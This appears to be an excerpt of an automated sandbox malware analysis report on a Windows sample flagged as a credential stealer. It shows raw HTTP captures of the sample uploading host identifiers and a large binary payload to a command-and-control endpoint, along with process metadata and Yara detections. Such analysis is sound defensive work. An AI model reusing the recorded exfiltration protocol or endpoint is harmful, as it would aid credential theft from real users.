                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1580&rtt_var=597&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21161&delivery_rate=1823860&cwnd=213&unsent_bytes=0&cid=54e8a5e6c73ba394&ts=979&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:18:55 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                  2024-12-23 06:18:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  6192.168.2.849713104.21.66.864431464C:\Users\user\Desktop\0gnHF2twcT.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:18:57 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=90K0SFJK
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 1170
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:18:57 UTC1170OUTData Raw: 2d 2d 39 30 4b 30 53 46 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 31 35 43 44 30 42 32 43 39 46 32 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 30 4b 30 53 46 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 30 4b 30 53 46 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 39 30 4b 30 53 46 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                                                                                                                                                                  Data Ascii: --90K0SFJKContent-Disposition: form-data; name="hwid"12F15CD0B2C9F241AC8923850305D13E--90K0SFJKContent-Disposition: form-data; name="pid"1--90K0SFJKContent-Disposition: form-data; name="lid"PsFKDg--pablo--90K0SFJKContent-Disposit
                                                                                                                                                                                                                                                                  2024-12-23 06:18:58 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:18:58 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=2b2o8r5f6vheg97benuuli2fpc; expires=Fri, 18 Apr 2025 00:05:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2FHQR1Hg6hZOvLQR%2BlYU31wecUr14VNX4QG%2FeztHjBDMd%2BzzNEheyEH4zQJxoXxaY7FD%2BHN5ZgDRxNp9lPZtExkhzRyg6SAoQ3%2FVpf6ZCj7%2FYPExz7XKO3Eu%2BQaR4RAo%2B6M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f663cbe9ce443a0-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1552&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2076&delivery_rate=1820448&cwnd=219&unsent_bytes=0&cid=1e16c614f88c114b&ts=793&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:18:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                  2024-12-23 06:18:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  7192.168.2.849714104.21.66.864431464C:\Users\user\Desktop\0gnHF2twcT.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:19:00 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=08RS2QQ5TDI6
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 588250
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:19:00 UTC15331OUTData Raw: 2d 2d 30 38 52 53 32 51 51 35 54 44 49 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 31 35 43 44 30 42 32 43 39 46 32 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 38 52 53 32 51 51 35 54 44 49 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 38 52 53 32 51 51 35 54 44 49 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 30 38 52 53 32 51 51 35 54 44 49 36 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: --08RS2QQ5TDI6Content-Disposition: form-data; name="hwid"12F15CD0B2C9F241AC8923850305D13E--08RS2QQ5TDI6Content-Disposition: form-data; name="pid"1--08RS2QQ5TDI6Content-Disposition: form-data; name="lid"PsFKDg--pablo--08RS2QQ5TDI6
                                                                                                                                                                                                                                                                  2024-12-23 06:19:00 UTC15331OUTData Raw: 46 f6 77 84 bb 58 ae ea 83 05 c6 4f 9b 83 bf 25 df 69 f8 58 98 46 2a e8 3e 1d dd 40 04 0f 8a b7 2f d9 4e 45 e8 c0 95 9e 08 bb 6d 2a 4f 2c 41 42 b3 f6 43 f1 a4 88 43 f1 a2 40 6e 0c 4a ad 85 53 4e 3b 32 5c a5 40 92 1d a1 80 bf 99 40 cd c4 e5 19 ca 33 ce a5 76 ee e9 d0 1d 6d 46 b4 9f c9 66 99 d4 49 40 bf bb 1f 70 9a e7 e8 a3 27 51 dc 17 de 3e 7e 6d dd b3 65 28 51 7d f7 71 57 81 d1 ca 88 85 ff f6 b1 2f f2 11 80 09 9b 9f 71 13 30 24 30 63 77 7f 07 c2 40 0d 6a 56 9c d5 30 47 22 28 ee a6 c6 11 79 86 fd af 9a 06 4f 7c 4f 30 e3 11 56 60 27 92 0f 87 7c 05 a9 de 1b bd 05 d7 00 7d a0 22 4e fc 30 ac ad de 17 21 8d 8c 77 fc e1 25 7b 69 f4 a5 22 fb 66 c9 9e 8c 59 f4 3c 35 06 9a a8 23 d1 d7 e7 96 4c 0f 04 b7 8c c4 19 8e e2 3b 5c 3f 41 ed 02 19 1e b6 7c c0 7b 3c c5 ce f5
                                                                                                                                                                                                                                                                  Data Ascii: FwXO%iXF*>@/NEm*O,ABCC@nJSN;2\@@3vmFfI@p'Q>~me(Q}qW/q0$0cw@jV0G"(yO|O0V`'|}"N0!w%{i"fY<5#L;\?A|{<
                                                                                                                                                                                                                                                                  2024-12-23 06:19:00 UTC15331OUTData Raw: 7d 2a f0 f2 2f e1 b0 7b 85 e6 bb c4 76 08 12 17 cb 7c c6 6f ea 47 78 69 15 66 d2 db 0a 57 9e d4 05 ba a7 45 46 44 6c 1e bc 8c bc 5d f7 ac 20 fc 1b 75 26 7d 8e a5 8e 3a b5 2e ce b0 db d3 82 be ba 1f 9f 46 9b 27 36 7f 31 14 5d 19 96 a1 0b 7d cc a6 cc 10 dc 78 c1 25 05 0d c8 b1 ad 75 ba d2 66 bb b4 7f e3 5e dd 7c 68 62 f0 cc cd 8a 8d 6b 3e ed a7 8f 94 d8 6f 8f 17 cd ff 78 c6 f2 97 28 2e 76 04 f8 49 9f a5 9f 1a 03 cf 9c 93 e7 62 0d d6 2c 9f da ac ff 1d 49 c8 d4 4f b0 4e 46 95 66 1e 02 be 3f d9 4b a3 fb 00 dc e3 d9 95 e4 5f f7 5f b9 9c 11 ea 36 00 96 ed bd 13 a0 23 e0 12 38 34 78 ef 90 53 ea 78 82 3a 0e 98 70 ca a4 8e fe 77 a7 cd 43 1c 7c 41 08 dc 21 81 b5 64 ae 35 42 27 e4 81 db 25 cc f7 ff 3b c1 4a f1 3c ea fb 7b 24 c2 42 c0 2d fd 20 92 0c 30 20 28 4c 1d 64
                                                                                                                                                                                                                                                                  Data Ascii: }*/{v|oGxifWEFDl] u&}:.F'61]}x%uf^|hbk>ox(.vIb,IONFf?K__6#84xSx:pwC|A!d5B'%;J<{$B- 0 (Ld
                                                                                                                                                                                                                                                                  2024-12-23 06:19:00 UTC15331OUTData Raw: 71 3e 9f 2b d5 5a 0f b7 bc 6a b8 49 12 e3 8a f3 1f 50 20 f2 5a 7b 4d 8d 27 0f 81 7c af 50 da 13 36 2c f6 7c 44 e6 af 3c c3 76 00 46 be 75 ed e8 60 24 48 ad 7d 73 2a e9 7a ac 82 7a 02 a0 b6 1a 45 7f 21 75 12 d4 c3 aa bd e6 12 1b 43 ff f6 48 de e4 59 d0 1a 5a 3f 47 27 19 7d 84 93 49 e9 2c c3 1b c1 f5 8b e1 9c bc 0c 3d de 8c 98 88 a6 b6 e5 c4 c5 23 49 73 61 de 3f d7 1b 75 49 2a 5b 39 3e 0b 1e 49 79 3f 6c 86 c4 b6 2e 65 f7 5c 2c d4 04 ab 30 21 e1 b3 1b 9c 7f 37 b6 97 5d 94 fa 65 5e e5 f5 c5 e1 9f 66 20 08 11 b8 c8 d8 d4 19 16 97 a4 ce 87 89 be 80 a4 26 70 37 0b 84 f2 2e aa e4 de 00 1a 29 bb a4 fe 88 fc d9 b4 88 1f e6 06 d7 52 08 c3 dc c9 af 73 c3 c5 bb d9 ed eb 6a 96 ba 00 b6 e0 ce cc 35 5d 70 11 d5 7b 14 34 04 ac 7b 0d 64 7f 95 0b 76 4a 3a ce 61 0f 38 43 27
                                                                                                                                                                                                                                                                  Data Ascii: q>+ZjIP Z{M'|P6,|D<vFu`$H}s*zzE!uCHYZ?G'}I,=#Isa?uI*[9>Iy?l.e\,0!7]e^f &p7.)Rsj5]p{4{dvJ:a8C'
                                                                                                                                                                                                                                                                  2024-12-23 06:19:00 UTC15331OUTData Raw: f5 e6 55 60 64 06 65 3c d0 c0 3c a2 6e 5c 76 be b5 4b 88 8a 2b e5 9d 0d f9 df c2 71 a3 55 1c 70 b5 85 1d 40 a2 53 c2 65 8d 0a b4 8b 80 fa 42 01 ba cc 9b 71 9a 6c 02 0a 24 ff fe e0 e3 7a 8c 0c 6e 75 a7 d6 70 b5 f3 29 34 38 a8 21 00 e1 c9 86 75 d5 1d 32 50 46 29 90 14 8f c5 f0 1c dd 6a 09 4e 7d a1 33 fb f3 7a 23 ed 85 ed 81 aa ce 58 ae e3 7c 90 7a 08 4e ce dc 0c 97 51 2f 15 a4 96 3c e9 2e 17 c5 54 40 7c 6b c5 e5 92 e4 c3 88 cd 63 2b 6e 0e 11 4c a1 36 18 98 49 c5 a7 7b cf d7 50 6c 53 1a c2 45 46 ce dd 48 21 4b 0b 1f e6 e2 b5 30 3d 7a c2 0d 45 22 a7 f0 47 0f d7 ef aa d6 dd ef 41 dc 8d ea 7a 4e f8 77 28 14 11 2a 86 75 9a 2f 7b 66 de 2f 9a 8b b1 1c 08 51 13 40 34 17 91 2d 1c 22 f4 b6 2d 7a 8e 6a 22 ad 9a d2 8f 6f 89 4e 29 8d 7e 28 62 89 cd 79 9f 6b 3f 04 ae df
                                                                                                                                                                                                                                                                  Data Ascii: U`de<<n\vK+qUp@SeBql$znup)48!u2PF)jN}3z#X|zNQ/<.T@|kc+nL6I{PlSEFH!K0=zE"GAzNw(*u/{f/Q@4-"-zj"oN)~(byk?
                                                                                                                                                                                                                                                                  2024-12-23 06:19:00 UTC15331OUTData Raw: 9c 35 af e9 32 53 5a 2f 1f 3c ff 3b 6d 71 cd b2 14 9a 2f 80 db 0e 47 2e 67 f8 a0 2b f6 58 04 2d 5f b9 62 83 07 2f cb fe 3d 58 ef 86 7c 35 3b 10 92 04 92 f8 d1 72 f6 be 8a 2f 63 f6 e1 ba 16 c4 d6 f8 51 fe 44 88 f7 7f b8 4e a3 a9 a2 6f ab d6 8c 9d 94 d6 68 73 60 6e d2 d5 7a f8 86 cf 66 4b fc c5 5b e4 3e 93 46 8b 3c 42 6a 00 c7 f2 99 9a 7a 53 76 5c 6c 6c 78 8e 11 35 36 28 43 02 ff ab bb 48 7b b5 98 d0 d6 ba a1 d7 42 c6 09 5c 1a 55 9b fb 05 a6 2f 63 9e 2b 0a 82 c4 87 54 8e f0 2c 89 cc b0 12 06 03 aa 02 f0 d9 b4 a6 2e fa e1 76 93 90 c3 73 d7 4c 4d b0 70 22 b4 a3 14 84 90 82 69 31 f0 1e 81 a4 7d 04 1c d0 b9 05 31 3f a9 82 7d 02 a6 0e 80 39 fc e9 36 1a f8 d1 69 d4 cc 77 7c 2d d0 d7 ff dc ac 7d b6 3f fc 89 4b c9 ca 1c 89 b0 c1 aa 9a 32 41 05 6d 34 54 5f 5b c6 c9
                                                                                                                                                                                                                                                                  Data Ascii: 52SZ/<;mq/G.g+X-_b/=X|5;r/cQDNohs`nzfK[>F<BjzSv\llx56(CH{B\U/c+T,.vsLMp"i1}1?}96iw|-}?K2Am4T_[
                                                                                                                                                                                                                                                                  2024-12-23 06:19:00 UTC15331OUTData Raw: 65 7c 14 6a 3b 56 4d bb 49 cd 25 72 72 e5 c7 3b aa ba 1c 65 11 6f b8 72 da 78 3e aa b3 7d ef 4e d3 cb af a5 3a b7 df 71 9e 89 0d 37 1f 11 69 79 03 0e f6 46 2b cc fd 34 2c a9 c2 1c 40 89 24 e2 70 44 a6 52 91 37 e6 b9 94 fd 17 43 3c f6 2c 59 b7 77 cd cb 83 3f a1 97 49 eb 41 25 d1 21 56 f3 19 58 48 be 1c c4 86 bf 1e f7 47 d0 ce 1c 7e b5 63 39 61 b7 fb fb 54 4b 92 09 1a 29 38 b3 45 b6 65 aa 24 7a 54 4a f6 bb 02 86 ff ac 2a a4 6a 41 ec d2 9a 2e 7d 5d d3 59 22 17 1d 27 c4 59 e8 8b 72 96 7e e2 27 59 a7 e6 01 2e 3f a2 42 3c 43 39 c2 fa 7c 80 1d 20 94 20 9b c3 f3 8b 5e d1 61 35 53 fe 9d f1 41 ea b5 2b 87 01 cc 91 eb 73 e3 0e cb 39 88 01 12 6b a8 d5 ba fc c8 08 7f 7e 60 61 81 a2 12 b5 81 84 4d d2 14 2f 7c 3e a1 a4 30 79 8e ba 4f 17 c7 3c 6b 47 25 bd fc 16 7e 00 cd
                                                                                                                                                                                                                                                                  Data Ascii: e|j;VMI%rr;eorx>}N:q7iyF+4,@$pDR7C<,Yw?IA%!VXHG~c9aTK)8Ee$zTJ*jA.}]Y"'Yr~'Y.?B<C9| ^a5SA+s9k~`aM/|>0yO<kG%~
                                                                                                                                                                                                                                                                  2024-12-23 06:19:00 UTC15331OUTData Raw: 30 87 85 5e 40 51 b7 85 c0 0c 9c 02 39 45 02 ec da 93 89 0e b1 38 f5 17 1a 52 26 e8 ef b3 d9 a0 0d 69 56 91 9f 6c 99 84 3e f3 59 f2 dd 72 a2 e0 b4 21 da b9 93 69 82 e2 15 ed 19 cc af ed 3c a2 97 04 35 26 d0 00 3c b5 ea b9 55 61 37 b5 09 c1 52 c7 ac d1 e6 a0 c7 ef 82 a5 38 db b0 ed 6b f9 08 4a 12 aa 57 d8 c3 a8 8b 2d 7f eb 12 08 e7 bf e9 79 41 7b f8 ce 32 b7 fb 26 7f 08 e5 40 1f 34 65 89 fb 39 b1 8a 5c 3b 20 7e 3f dc 5f 82 c3 ac e4 b7 6f b3 01 58 e8 e7 33 92 5a 46 84 b1 06 22 31 c0 84 57 2e 49 b5 1f a9 15 4e ad 45 b7 a0 b9 b3 20 87 96 4a 48 39 41 8d 4c 9e b3 f8 c0 f8 ee 9a b3 0c 69 12 f6 16 ba be 0a de a6 22 87 98 a2 b7 28 16 ff 50 97 93 7e 39 d2 82 30 ff 10 2a cb ad 97 4a d0 ec 60 63 8b 41 2a 2b b5 75 a2 6a ef e1 ab aa b1 11 76 23 8d 41 51 21 72 e0 a5 73
                                                                                                                                                                                                                                                                  Data Ascii: 0^@Q9E8R&iVl>Yr!i<5&<Ua7R8kJW-yA{2&@4e9\; ~?_oX3ZF"1W.INE JH9ALi"(P~90*J`cA*+ujv#AQ!rs
                                                                                                                                                                                                                                                                  2024-12-23 06:19:00 UTC15331OUTData Raw: 5d a2 b6 98 2b c7 f9 94 af d8 89 71 4e b9 10 67 cd e9 87 ff 4f 06 22 fc 91 d2 52 25 04 8c 1d fd 55 39 7f dc a4 3b 28 82 64 6d e9 6a 45 88 9a ff 51 01 79 1a 0d 72 de 90 f4 af bc 88 89 fe a4 b2 16 f0 a0 34 e2 0e d9 0a 69 3b 78 5b bf ad f5 08 8a 50 dd 2e 73 cb e5 4d 1e 08 2b 7a 40 cb 47 a1 f4 6e 18 36 b0 26 b0 a7 40 a8 bf 10 50 5e 06 05 e1 98 ff bd 02 87 d4 86 f8 75 ac 1f 02 46 6e 37 33 54 07 fa 41 19 b7 70 9d c9 ce 23 87 30 a4 7e 86 b1 dd 5b 3a 04 ab 21 70 5d 9a 6d 23 66 64 95 dd cb 7e 13 ce c7 65 24 ea 3e f0 bc 6c 2d b9 7c 36 02 b5 f0 b6 50 6e 0c 31 ac a2 9f 4a 6b db c7 7b a9 dc 76 44 9d 9a 88 f8 a4 43 f9 d8 0a dd ad 60 9c 1e 90 f0 66 3f ca 58 f6 52 a7 be 58 ef d4 36 bd e0 08 21 9e fd 8c c9 23 9b 77 6e 96 aa bc 3b 1c 6d bb 8b 75 00 d7 64 14 d1 c5 e3 db b4
                                                                                                                                                                                                                                                                  Data Ascii: ]+qNgO"R%U9;(dmjEQyr4i;x[P.sM+z@Gn6&@P^uFn73TAp#0~[:!p]m#fd~e$>l-|6Pn1Jk{vDC`f?XRX6!#wn;mud
                                                                                                                                                                                                                                                                  2024-12-23 06:19:00 UTC15331OUTData Raw: 4f 62 0c 79 8c eb 5a df ad cb fa 94 8b a7 06 0c 11 fe 97 0b e8 45 fb 3f ff e8 16 00 2f 5c 68 82 9c 8b 22 73 3f 77 a4 52 a3 a9 82 e0 38 8c fb 77 62 3a a5 b5 be f6 be 18 81 57 d0 fd b9 fb 13 b7 af 1a 1b 71 4f 50 58 96 53 9c 86 7b cd 74 c4 86 be 3c ad e3 ae 8f 15 49 ee f5 33 13 22 04 a6 5f 88 47 03 7c b7 ff 7c df 83 f3 c5 50 e8 bf 9b e7 47 12 a6 51 31 82 40 ff 88 1d c6 90 79 c7 ba 0a 80 d2 06 05 26 3e f1 2e 9d 9f 94 4e aa 9d e0 e8 fd bb 05 91 9e 40 c0 23 98 51 b2 f8 50 ca 73 bd 44 02 be d0 c2 78 83 c0 07 e3 bb 35 e8 3c 77 56 61 50 9e f2 3e 61 4d 44 7e 2a b3 cb 63 b5 f1 8b ce 73 3d e8 94 20 42 49 44 48 03 14 d8 b2 93 f5 38 6f d7 1a a4 62 31 cc 52 d0 fa 39 6c 92 9d 7f 13 dd bd 5a b3 d3 98 db c9 83 a5 3a 24 45 95 da 80 03 04 5b 12 e0 12 60 52 25 74 ed 88 b3 d3
                                                                                                                                                                                                                                                                  Data Ascii: ObyZE?/\h"s?wR8wb:WqOPXS{t<I3"_G||PGQ1@y&>.N@#QPsDx5<wVaP>aMD~*cs= BIDH8ob1R9lZ:$E[`R%t
                                                                                                                                                                                                                                                                  2024-12-23 06:19:03 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:19:02 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=chsn3fbuqk4gf4aptnf3fnrhn0; expires=Fri, 18 Apr 2025 00:05:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bBgehdgw00gOuhoXQV0al6vlMfFW7pzCrWAPyQtBkmxrUbSYzCTrJZpUi9PPisQVDiL2IKUN22IQ7bl2qFJTgVch7zbHDqAgEPcgt%2Bg9jpJS4E%2B4Aeyd1sgWgD0NBHI3UNI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f663cd25ee241de-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1849&min_rtt=1588&rtt_var=782&sent=353&recv=612&lost=0&retrans=0&sent_bytes=2834&recv_bytes=590834&delivery_rate=1838790&cwnd=225&unsent_bytes=0&cid=07d2c59fa8ab86ba&ts=2352&x=0"


                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                  Start time:01:18:36
                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\0gnHF2twcT.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\0gnHF2twcT.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x70000
                                                                                                                                                                                                                                                                  File size:1'881'600 bytes
                                                                                                                                                                                                                                                                  MD5 hash:85BFDE4071D80BB2BDFFB80F68D54D17
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Reset < >
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.1629815707.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A53000, based on PE: false
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000003.1698020016.0000000000A53000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_a51000_0gnHF2twcT.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: K.$"
                                                                                                                                                                                                                                                                    • API String ID: 0-2064305032
                                                                                                                                                                                                                                                                    • Opcode ID: 20637d7a64f39fbdbcf366d4b106b28d6e4205e61b74bbf14ca7839609cb0a09
                                                                                                                                                                                                                                                                    • Instruction ID: 4aec1f176fbe1dd5047b2d1404ab4409ca799f21b53dd379419887adc0e05639
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20637d7a64f39fbdbcf366d4b106b28d6e4205e61b74bbf14ca7839609cb0a09
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E502123144D7C94FD717DB708A666457F60BB03722F2A42CFC8818F4A7E2689A1AC792
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.1629815707.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A51000, based on PE: false
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000003.1697927134.0000000000A51000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_a51000_0gnHF2twcT.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: K.$"
                                                                                                                                                                                                                                                                    • API String ID: 0-2064305032
                                                                                                                                                                                                                                                                    • Opcode ID: d952aa9fe2da537fc4973a3b390d4e9901048e7bf2d5e78dcde7005fad06d825
                                                                                                                                                                                                                                                                    • Instruction ID: 4aec1f176fbe1dd5047b2d1404ab4409ca799f21b53dd379419887adc0e05639
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d952aa9fe2da537fc4973a3b390d4e9901048e7bf2d5e78dcde7005fad06d825
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E502123144D7C94FD717DB708A666457F60BB03722F2A42CFC8818F4A7E2689A1AC792
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A35000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_a2d000_0gnHF2twcT.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a9d2e35ff53e1cbfe6b479e96df18c90b63f04cc91cd3786fc25d50427fd0156
                                                                                                                                                                                                                                                                    • Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9d2e35ff53e1cbfe6b479e96df18c90b63f04cc91cd3786fc25d50427fd0156
